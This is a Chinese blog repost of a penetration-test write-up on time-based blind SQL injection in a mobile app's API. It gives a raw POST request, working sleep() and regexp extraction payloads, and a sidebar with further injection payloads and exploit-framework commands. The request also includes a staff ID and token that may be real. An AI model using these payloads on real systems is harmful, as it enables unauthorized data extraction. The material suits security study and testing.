某APP渗透测试-sql时间盲注

最新推荐文章于 2022-11-16 22:56:26 发布
最新推荐文章于 2022-11-16 22:56:26 发布
阅读量1.4k 收藏 2
点赞数
文章标签: 数据库 移动开发
原文链接:http://www.cnblogs.com/nicksec9101/p/7371599.html
版权

前几天在测试某个APP,用工具简单扫描后,提示存在sql注入,而且是时间盲注,简单介绍一下盲注,盲注是不能通过直接显示的途径来获取数据库数据的方法。在盲注中,攻击者根据其返回页面的不同来判断信息(可能是页面内容的不同,也可以是响应时间不同)。

存在注入的链接

使用的是post提交参数,这个是扫描器给出的测试语句

POST /app/systemmsg/QRY_SYSTEM_MSG.action HTTP/1.1
Content-Length: 219
Accept: */*
User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; NX529J Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Crosswalk/15.44.384.13 Mobile Safari/537.36x5app/3.2.16
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Language: zh-cn
Connection: close

loginStaffId=214350&token=78ecb4abf699b1a085cd313f5c83c81a&service_v=3.0&appVersion=3.2.16&params=%7b%22recive_staff_id%22%3a214350%2c%22log_type%22%3a%2203%2c04%2c05'%2b(select*from(select(sleep(20)))a)%2b'%22%2c%22pageSize%22%3a10000%2c%22pageStart%22%3a0%7d
猜测可能没有过滤加号
删掉了一些敏感信息,探测的语句如上,
解码后关键的注入地方为log_type":"03,04,05'+(select*from(select(sleep(20)))a)+'
一开始测试的时候,在log_type输入任意的注入语句都会sleep成功,以为是误报,后来用了regexp '^xx'来匹配数据库的内容,匹配成功再sleep,最后的payload如下
payload:loginStaffId=214350&token=78ecb4abf699b1a085cd313f5c83c81a&service_v=3.0&appVersion=3.2.16&params={"recive_staff_id":214350,"log_type":"03,04,05'+(select*from(select((select database()) regexp '^w' and sleep(5)a)+'","pageSize":10000,"pageStart":0}
sleep在where语句中会被计算多次,在实际应用中需要根据表中的记录数,做相应的处理。这次测试的页面匹配数据库中以w开头的数据库,sleep(5)的时间延长到10,猜测可能存在两个以w打头的数据库,触发两次sleep()延迟10秒
写了一个简单的py脚本,比较菜,写得不好

最后爆出来的数据库名为wxxxdb,到开发人员那边去核对,的确是这个数据库名,哈哈

同样存在注入的还有一个链接

payload和刚刚的一样,但是这个链接的sleep时间为原本的4倍。

 

转载于:https://www.cnblogs.com/nicksec9101/p/7371599.html

weixin_34381666
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
渗透测试 | SQL基于布尔的
yu_19980401的博客
11-18 264
渗透测试 | SQL 普通SQL入和SQL的区别 普通 执行SQL入攻击时,服务器会响应来自数据库服务器的错误信息,信息提示SQL语法不正确等 一般在页面上直接就会显示执行sql语句的结果 SQL SQL,服务器不会直接返回具体的数据库错误or语法错误,而是会返回程序开发所设置的特定信息 在页面上不会直接显示sql执行的结果 有可能出现不确定sql是否执行的情况 SQL的思路 基于布尔的 可通过构造真or假判断条件(数据库各项信息取值的大小比较,如:字段
渗透测试(一)SQL
Cobb_L
08-28 397
SQL测试靶场(掌控安全学院SQL入靶场):https://hack.zkaq.cn/battle/target?id=1bd1990363f28cb9 找出原链接查询数据字段数 order by 3 时无数据了,则可判断字段数为2,可做接下来操作 试着找到当前数据库名长度(2.3步其实不用做) and length(database())>11 尝试判断库名长度,测试为12 尝试将库名找出 and ascii(substr(database(),1,1))>=107 通过
渗透测试之SQL手工
追风筝的孩子
08-09 2066
         所谓SQL入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意的)SQL命令入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。 [1]  比如先前的很多影视网站泄露VIP...
WEB渗透测试数据库
04-01
PentestDB 1 介绍 本项目用于提供渗透测试的辅助工具、资源文件 1.1 辅助工具 提供轻量级的易扩展的工具,可以快速编写exploit、添加漏洞验证/扫描规则、添加指纹规则、爆破规则等;包含以下功能: Exploit系统。易扩展的exploit系统,能够使用API快速编写exploit,能够批量执行exploit 子域名爆破。爆破子域名,使用域传送、DNS爆破、GoogleHacking进行子域名爆破 C段扫描。C段扫描,支持生成html格式输出文件 服务端应用识别。识别CMS类型、Web服务器、操作系统、WEB中间件等 URI敏感资源爆破。爆破WEB敏感文件,整站备份、配置备份、敏感文件等 社工密码字典生成。根据社工信息生成密码爆破字典 Google Hacking。GoogleHacking,生成URL字典 编解码等功能。支持非常丰富的编解码方式,方便做payload编码 1.2 资源文件 各种渗透测试常用的资源文件,包括各种爆破字典、exploit、webshell、攻击payload等 2 安装 从这里下载最新版本,或使用命令 git clone https://github.com/alpha1e0/pentestdb.git clone到本地 PentestDB支持Windows/Linux/MacOS,需使用python 2.6.x 或 2.7.x运行 2.1 解决lxml依赖 项目中的脚本文件依赖于lxml linux系统一般默认安装lxml,如果没有可通过以下方式安装: pip install lxml apt-get install lxml yum install lxml windows可通过以下方式安装lxml: 到这里找到对应系统的安装包,下载到本地 安装安装包,pip install package.whl 2.2 解决nmap依赖 项目中的C段扫描依赖于nmap扫描器 到这里下载nmap相应版本 在windows下需要设置环境变量,让系统能够找到nmap.exe。 3 使用 3.1 常用脚本 项目中的python脚本提供用有用的渗透辅助功能,根目录下的pen.py为脚本入口,另外script目录下也有其他一些脚本。 3.1.1 Exploit系统 pen.py的exploit子命令提供了exploit模块相关操作,exploit模块是一个轻量级的exploit框架,可以编写各种web漏洞的exploit: 搜索exploit信息 增加、删除、修改exploit信息 执行某个exploit 搜索并批量执行exploit exploit保存在项目根目录下的exploit目录下 例如: # 列举、搜索、册、更新、删除 pen.py exploit -l pen.py exploit -q appName:joomla pen.py exploit --register exploit pen.py exploit --update cms_joomla_3_4_session_object_injection.py pen.py exploit -d "Joomla 1.5~3.4 session对象入漏洞exploit" pen.py exploit --detail "Joomla 1.5~3.4 session对象入漏洞exploit" # 执行exploit pen.py exploit -e cms_joomla_3_4_session_object_injection.py -u http://127.0.0.1:1234 --attack pen.py exploit -s appName:joomla -u http://127.0.0.1:1234 --verify pen.py exploit -s appName:joomla -u @url.txt :有关exploit模块的详细信息请参考exploit/readme.md 3.1.2 服务端应用识别 pen.py的service子命令提供了服务端应用识别的功能,能够识别服务器信息,包括: 操作系统 web服务器 web中间件 CMS等 例如: pen.py service http://xxx.com # 开启CMS识别加强模式 pen.py service http://xxx.com --cms 3.1.3 社工密码字典生成 pen.py的password子命令提供了根据社工信息生成密码字典的功能,能够设置不同关键字生成密码字典
aap渗透_求渗透方面大佬指点,如何渗透app
weixin_39732506的博客
12-23 534
1.1 在需要抓包之前按ctrl+x清除所有数据包,然后进行按键操作,这时出来的第一批即是需要的数据包,没事按着玩1.2 添加过滤规则,手机抓包时,有很多类似,taobao,Windows,oppo,vivo等明显无关数据包,添加关键词过滤即可一劳永逸2.配置2.1 电脑ipconfig查看自己电脑本机ip2.2 连接到热点之后,长按(看自己手机)热点进行设置,设置手动代理,输入电脑的ip的端口(...
Android APP渗透测试方法大全-137页.pdf
10-08
Android APP渗透测试方法大全-137页
App渗透测试工具-adb安装
05-10
"App渗透测试工具-adb安装" 在今天的信息安全时代,渗透测试已经成为企业和个人保护自己系统和应用程序的主要手段之一。其中,App渗透测试是指对移动应用程序进行安全测试,以检测和修复潜在的安全漏洞。adb...
Android APP 渗透测试方法-137页.pdf
09-10
Android APP 渗透测试方法-137页.pdf
安卓App压力测试-Monkey的使用
01-27
可用于安卓App的压力测试,其原理是通过命令行向手机发送随机事件的指令,随机事件包括点击,划屏和输入等操作,这些操作都是随机不可控的,可控的是需要操作的App,每次操作间隔的时间以及随机事件的次数等。...
Android APP渗透测试方法大全.pdf
07-30
【Android APP 渗透测试方法】是针对安卓应用程序进行安全评估的一种重要手段,旨在发现潜在的安全漏洞和风险,确保用户数据和系统安全。本篇文档详细介绍了渗透测试的方法和工具,适合不同层次的读者学习。 1. **...
渗透神器明小子
06-06
所谓的SQL(结构化查询语言)入,简单来说就是利用SQL语句在外部对SQL数据库进行查询,更新等动作。首先,数据库作为一个网站最重要的组件之一(如果这个网站有数据库的话),里面是储存着各种各样的内容,包括管理员的账号密码,脚本入攻击者把SQL命令插入到WEB表单的输入域或页面请求的查询字符串,欺骗服务器执行恶意的SQL命令,在某些表单中,用户输入的内容直接用来构造动态的SQL命令,或作为存储过程的输入参数,从而获取想得到的密码或其它服务器上的资料。
MySQL之增删改查基础,多例子
MMMMMMMay
08-16 1108
MySQL之增删改查,详细干货,多例子
SQLMAP自动入(一)
weixin_30337251的博客
07-15 258
一,五种常见的入方式 基于Bool类型的入方式 基于时间 ' and (select * from (select(sleep(20)))a)--+ 基于错误的检测 服务器把错误信息反馈回来(少见) 基于UNION联合查询 联合查询的前提是通过for(while)循环直接输出联合查询结果,...
【mac 安全渗透测试】之SQL入Demo
LYX_WIN
12-22 3727
一、下载安装sqlmap 1、官网地址:sqlmap: automatic SQL injection and database takeover tool git下载: git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev 2、验证sqlmap安装成功: ./sqlmap.py -v 显示如下日志则说明成功: __H__ ___ ___[)]_____ ___ ___ {1
app渗透测试抓不到数据包怎么办?
阿大撒大撒的博客
11-16 2638
app渗透测试抓不到数据包怎么办
数据库mysql锁测试(间隙锁、临键锁)
weixin_43931625的博客
11-20 1693
数据库mysql 锁测试 数据库mysql 在可重复读、序列化隔离级别下使用的是间隙锁或者临键锁(间隙锁+行锁) 加锁规则:(隔离级别可重复、序列化) 主键索引或者唯一索引查询具体的值(如a=“value”)且value值存在时,可只加行锁,若不存在需要加间隙锁; 主键索引或者唯一索引进行范围查询(如a>"value")时,需要加间隙锁或者临键锁; 非唯一索引需要在可重...
Select * from (select * from Table)
热门推荐
生态猴
12-12 1万+
今天在写SQL的过程出现这样的问题消息 8156,级别 16,状态 1,第 2 行 多次为 ‘a’ 指定了列 ‘ID’。 原因是Select * from (select * from Table)这样是无法解析的Select * from (select a.xx,a.xx from Table as a) xx是对应的列明
Kali Linux渗透测试 093 自动-Sqlmap
kevinhanser
09-17 7785
本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程 1. Sqlmap 简介 2. Target 3. Requests 4.Optization(优化) 5. injection 6. detection 7. techniques 8. fingerprint(指纹
App性能测试-GT下载安装
最新发布
10-20
GT是一款由腾讯出品的开源测试工具,可以直接运行在手机上的“集成调测环境”,用于Android客户端性能测试。如果您需要下载和安装GT,可以在腾讯开源官网上找到相关的下载链接和安装教程。在使用GT进行性能测试时,可以关CPU、内存、FPS、耗电量等指标,并将测试结果制作成表格进行比较分析,以定位和分析性能瓶颈,有助于开发更好地进行性能调优。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值